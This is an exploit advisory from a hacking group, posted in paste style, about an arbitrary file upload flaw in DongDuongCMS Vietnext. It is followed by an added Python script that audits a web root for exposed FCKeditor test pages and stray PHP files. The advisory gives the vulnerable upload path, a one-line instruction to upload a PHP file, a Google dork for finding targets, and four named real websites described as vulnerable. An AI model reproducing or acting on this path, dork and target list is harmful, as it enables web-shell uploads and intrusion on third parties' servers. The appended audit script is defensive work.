KingSkrupellos

DongDuongCMS Vietnext Unauthorized File Insertion Vuln

Mar 4th, 2019
####################################################################

# Exploit Title : DongDuongCMS Vietnext Unauthorized File Insertion Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 04/03/2019
# Vendor Homepages : dongduongcorp.com ~ dongduongcms.com ~ vietnext.vn
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Design by Vietnext ® site:vn
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/issue/WLB-2019030021

####################################################################

# Description about Software :
***************************
DongDuongCMS Vietnext is a Vietnamese Web Hosting and Web Development Company.

####################################################################

# Impact :
**********
DongDuongCMS Vietnext is prone to an arbitrary file upload vulnerability.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

####################################################################

# Arbitrary File Upload / Unauthorized File Insertion Exploit :
*****************************************************
/jscripts/FCKeditor/editor/filemanager/upload/test.html

Choose PHP and upload your file.

# Directory File Path :
*********************
/vantindat/images/......

####################################################################

# Example Vulnerable Sites :
*************************
[+] tudonghoa2hand.com/jscripts/FCKeditor/editor/filemanager/upload/test.html

[+] anhthinh.vn/jscripts/FCKeditor/editor/filemanager/upload/test.html

[+] viettechnic.com.vn/jscripts/FCKeditor/editor/filemanager/upload/test.html

[+] vinhlinh.com.vn/jscripts/FCKeditor/editor/filemanager/upload/test.html

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
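
For site owners checking their own deployment: the following is an added example, not part of the original advisory and not vendor code. It walks a local web root and reports FCKeditor file manager upload test pages (the filemanager/upload/test.html path named above) and PHP-executable files inside image upload directories. The directory name `images`, the extension list, the `uploadtest.html` name and the sample tree are assumptions.

```python
import os
import re
import tempfile

# The advisory's test.html, plus uploadtest.html as a generalization (assumption).
TEST_PAGES = {"test.html", "uploadtest.html"}
# Extensions a PHP-enabled server may execute (assumed list; match your handlers).
# Also catches double extensions such as "x.php.jpg".
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.IGNORECASE)


def audit_webroot(root, upload_dir_names=("images",)):
    """Return sorted (finding, relative_path) tuples for a local web root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/").lower()
        in_filemanager = "editor/filemanager" in rel_dir
        in_uploads = any(n in rel_dir.split("/") for n in upload_dir_names)
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if in_filemanager and name.lower() in TEST_PAGES:
                findings.append(("exposed-upload-test-page", rel))
            if in_uploads and SCRIPT_EXT.search(name):
                findings.append(("script-in-upload-dir", rel))
    return sorted(findings)


def build_sample_webroot(root):
    """Constructed sample tree for the demo (not taken from any real site)."""
    sample = [
        "jscripts/FCKeditor/editor/filemanager/upload/test.html",
        "jscripts/FCKeditor/editor/fckeditor.html",
        "site/images/logo.png",
        "site/images/a.php",
        "site/images/b.PHP.jpg",
        "site/index.php",
    ]
    for rel in sample:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("placeholder")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_webroot(tmp)
        for kind, rel in audit_webroot(tmp):
            print(f"{kind:26} {rel}")
```

A finding of the first kind means the editor's upload test page is still deployed and should be removed from the web root; a finding of the second kind is a file that needs review, since image directories should not hold executable scripts.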